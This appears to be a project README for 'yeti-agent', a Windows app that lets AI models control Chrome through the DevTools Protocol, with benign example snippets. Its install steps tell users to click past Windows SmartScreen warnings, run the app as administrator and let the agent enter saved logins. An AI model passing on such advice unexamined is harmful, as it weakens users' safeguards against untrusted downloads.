🐾 yeti-agent - Run AI Browser Tasks 24/7

🌟 What this is

yeti-agent is a desktop app for running browser tasks with AI. It opens a browser, follows your steps, and keeps working while you do other things.

It is built for people who want to automate web tasks without writing code. You can use it for sign-ins, form filling, data checks, simple web research, and other repetitive browser work.

📦 What you need

Before you install yeti-agent on Windows, make sure you have:

Windows 10 or Windows 11
A stable internet connection
At least 8 GB of RAM
2 GB of free disk space
Google Chrome installed
A valid AI provider account, such as OpenAI, Anthropic Claude, or Gemini

🚀 Download and install

Visit the releases page
Find the latest release at the top of the page
Download the Windows file for your computer
If the file is zipped, right-click it and choose Extract All
Open the extracted folder
Double-click the app file to start it
If Windows SmartScreen shows a warning, choose More info, then Run anyway, once you have confirmed the file came from the releases page

If no file is labeled for Windows, check the release notes for the file name that matches your system and download that file.

🖥️ First launch

When you start yeti-agent for the first time:

Open the app
Enter your AI provider key
Choose the model you want to use
Make sure Chrome is installed
Let the app connect to the browser

After setup, the app is ready to run browser tasks.

⚙️ Set up your AI key

yeti-agent needs access to an AI model to understand tasks and make decisions.

Common options:

OpenAI
Anthropic Claude
Gemini

To set it up:

Open the settings panel in the app
Paste your API key
Save the settings
Test the connection

If the test works, the agent can start using the model you picked.

🤖 How it works

The app uses a browser control method called CDP, or Chrome DevTools Protocol. In plain terms, this means the app can talk to Chrome and guide it through web pages.

You tell the agent what you want, and it handles browser actions such as:

Opening pages
Clicking buttons
Filling forms
Reading page content
Moving between tabs
Waiting for pages to load
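
To make the CDP idea more concrete, here is a minimal sketch of what the messages behind two of the actions above can look like. CDP commands are JSON objects with an `id`, a `method`, and `params`, sent to Chrome over a WebSocket. `Page.navigate` and `Runtime.evaluate` are real CDP methods, but the `cdp_message` helper is hypothetical and is not taken from yeti-agent's code. The sketch only builds the messages; it does not open a connection.

```python
import json
from itertools import count

# Each CDP request carries a unique integer id so replies can be matched to it.
_ids = count(1)


def cdp_message(method, **params):
    """Serialize one CDP command as the JSON text sent over the WebSocket.

    Hypothetical helper for illustration only.
    """
    return json.dumps({"id": next(_ids), "method": method, "params": params})


# "Opening pages": ask Chrome to load a URL in the current tab.
navigate = cdp_message("Page.navigate", url="https://example.com")

# "Reading page content": evaluate a JavaScript expression and return its value.
read_title = cdp_message(
    "Runtime.evaluate", expression="document.title", returnByValue=True
)

print(navigate)
print(read_title)
```

You do not need to write messages like these yourself. The app sends them for you based on the task you describe.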

🧭 Common uses

You can use yeti-agent for tasks like:

Logging into websites
Checking prices
Gathering data from pages
Copying info into a spreadsheet
Filling out repetitive forms
Watching sites for changes
Running scheduled browser jobs

🧰 Basic workflow

A normal task looks like this:

Start the app
Connect your AI key
Open Chrome
Enter the task you want done
Watch the browser as the agent works
Review the result when it finishes

You can keep the app open and let it handle more than one task.

🔐 Browser setup

For the best results, use a clean Chrome profile.

Recommended steps:

Close extra Chrome windows
Sign in to the sites you use
Turn off extensions you do not need
Keep one browser session open while the agent runs

This helps the agent move through websites without extra pop-ups or prompts.

🧪 Example tasks

Here are simple examples you can try:

Search a website for product names
Open a login page and enter saved details
Visit a dashboard and collect numbers
Fill out a web form from a text list
Check if a page changed since yesterday
Open several tabs and compare content

Keep the first task simple so you can see how the app behaves.
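
One of the examples above, checking whether a page changed since yesterday, comes down to comparing a fingerprint of the page text between two visits. The sketch below shows that idea in Python. The function names are hypothetical and this is not how yeti-agent necessarily does it; the page text is passed in as a plain string, so no browser is needed to try it.

```python
import hashlib


def fingerprint(page_text):
    """Return a SHA-256 fingerprint of the text, ignoring whitespace differences."""
    normalized = " ".join(page_text.split())
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()


def has_changed(previous_fingerprint, page_text):
    """Compare today's page text against the fingerprint saved on an earlier visit."""
    return fingerprint(page_text) != previous_fingerprint


# Save this value after the first visit.
yesterday = fingerprint("Price: $19.99\n  In stock")

print(has_changed(yesterday, "Price: $19.99 In stock"))  # False: only spacing differs
print(has_changed(yesterday, "Price: $17.99 In stock"))  # True: the price changed
```

Normalizing whitespace before hashing avoids false alarms when a site only changes its layout spacing.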

🛠️ Troubleshooting

If the app does not start:

Make sure you downloaded the latest release
Check that Windows did not block the file
Run the app as administrator
Restart your computer and try again

If the browser does not connect:

Close all Chrome windows
Reopen Chrome
Check that Chrome is installed
Try again after restarting the app
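
If you want to check the browser side yourself, the sketch below asks Chrome's debugging endpoint whether it is reachable. It assumes Chrome was started with remote debugging on port 9222 (the `--remote-debugging-port=9222` flag). Whether yeti-agent uses that port is an assumption, so adjust the `port` value if the app shows a different one. The `/json/version` endpoint is part of Chrome itself; the function names are hypothetical.

```python
import json
import urllib.error
import urllib.request


def parse_version_info(payload):
    """Pull the browser name and WebSocket URL out of a /json/version response."""
    info = json.loads(payload)
    return {
        "browser": info.get("Browser"),
        "ws_url": info.get("webSocketDebuggerUrl"),
    }


def probe_chrome(port=9222, timeout=2.0):
    """Return version info if Chrome answers on the debugging port, else None.

    The default port is an assumption, not a documented yeti-agent setting.
    """
    url = f"http://127.0.0.1:{port}/json/version"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return parse_version_info(resp.read().decode("utf-8"))
    except (urllib.error.URLError, OSError, ValueError):
        # Connection refused, timeout, or a reply that is not valid JSON.
        return None


if __name__ == "__main__":
    info = probe_chrome()
    print(info if info else "Chrome is not reachable on the debugging port")
```

If the script reports that Chrome is not reachable, close every Chrome window and start again from the first step in the list above.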

If the AI key does not work:

Check for typing mistakes
Make sure the key is active
Confirm you chose the right provider
Save the settings again
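
Many key problems come from how the key was copied, not from the key itself. The sketch below checks a pasted key for common copy-and-paste mistakes before you save it. It is an illustration only: `key_problems` is a hypothetical helper, it does not contact any provider, and it cannot tell you whether the key is active.

```python
def key_problems(raw_key):
    """List common copy-and-paste problems found in an API key string."""
    problems = []
    if raw_key != raw_key.strip():
        problems.append("leading or trailing whitespace")
    key = raw_key.strip()
    if not key:
        problems.append("key is empty")
        return problems
    if key[0] in "\"'" or key[-1] in "\"'":
        problems.append("wrapped in quotes")
    if any(ch.isspace() for ch in key):
        problems.append("whitespace inside the key")
    return problems


# Placeholder values, not real keys.
print(key_problems("abc123"))      # []
print(key_problems(" abc123\n"))   # ['leading or trailing whitespace']
print(key_problems('"abc123"'))    # ['wrapped in quotes']
```

An empty list means the text looks clean. You still need to run the connection test in the app to confirm the provider accepts the key.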

If a site does not load correctly:

Refresh the page
Try a different Chrome profile
Turn off blockers or extra extensions
Run the task again

🧩 Project details

yeti-agent is part of a browser automation stack built around LLMs, Chrome, and task control. It is meant to work alongside tools that use:

AI agents
Browser automation
Chrome DevTools Protocol
MCP
Python
Docker

The app aims to keep browser work running without constant input.

📁 Repo topics

The repository is tagged with these topics:

ai
ai-agent
anthropic
autonomous-agents
browser-automation
chrome-devtools-protocol
claude
docker
gemini
gpt-4
llm
mcp
nepal
openai
python
web-automation

🪟 Windows tips

For Windows users, these tips can help:

Keep Chrome updated
Use one browser session for testing
Store your AI key in a safe place
Give the app time to load pages
Use short task instructions at first
Leave Chrome open while tasks run

If Windows SmartScreen appears, first confirm that the file came from the releases page. Then choose More info and Run anyway to continue.

🧹 Simple usage rules

To get better results:

Use clear task text
Start with one action at a time
Avoid very long web forms on the first run
Keep pages stable while the agent works
Check the browser before starting a new task

Short, direct instructions usually work best.

📌 License and support

Check the releases page for the latest Windows build, version notes, and file names.

If you build from source later, keep the same Chrome version and AI settings so the app behaves the same way across runs.